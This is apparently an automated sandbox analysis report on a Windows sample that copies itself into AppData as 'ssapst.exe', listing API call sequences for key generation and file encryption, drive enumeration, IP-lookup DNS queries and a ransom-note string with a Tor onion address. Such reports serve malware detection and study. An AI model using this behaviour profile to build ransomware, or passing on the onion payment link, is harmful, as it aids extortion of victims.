Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE65860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	2_2_0FE65860
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE64B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	2_2_0FE64B20
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE634F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	2_2_0FE634F0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE653D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	2_2_0FE653D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	2_2_0FE66660
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE65670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	2_2_0FE65670
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE68400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	2_2_0FE68400
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE663E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	4_2_0FE663E0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE682B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	4_2_0FE682B0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE65860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	4_2_0FE65860
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE64B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	4_2_0FE64B20
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE634F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,	4_2_0FE634F0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE653D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,	4_2_0FE653D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	4_2_0FE66660
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE65670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	4_2_0FE65670
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE68400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	4_2_0FE68400

Source: wThN5MTIsw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wThN5MTIsw.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: z:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: x:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: v:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: t:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: r:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: p:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: n:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: l:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: j:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: h:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: f:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: b:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: y:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: w:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: u:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: s:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: q:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: o:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: m:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: k:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: i:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: g:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: e:
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	File opened: a:

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F4E6DF0
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F4E6BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	2_2_0FE66DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	2_2_0FE66BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	4_2_0FE66DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	4_2_0FE66BA0

Networking

Contains functionality to determine the online IP of the system

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F4E6FF0
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F4E6FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	2_2_0FE66FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	2_2_0FE66FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	4_2_0FE66FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	4_2_0FE66FF0

Found Tor onion address

Source: wThN5MTIsw.exe, 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f

May check the online IP address of the machine

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	DNS query: name: ipv4bot.whatismyipaddress.com

Source: wThN5MTIsw.exe, 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, ssapst.exe, 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: http://gdcbmuveqjsli57x.onion/cec3c1ad6b0ea08f
Source: ssapst.exe, 00000019.00000003.601906375.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/
Source: ssapst.exe, 00000018.00000002.585108554.00000000012E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/&
Source: ssapst.exe, 00000002.00000002.369878312.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/)
Source: wThN5MTIsw.exe, 00000000.00000002.335452470.00000000008D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/2
Source: ssapst.exe, 00000018.00000002.585108554.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000019.00000002.605561331.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/5
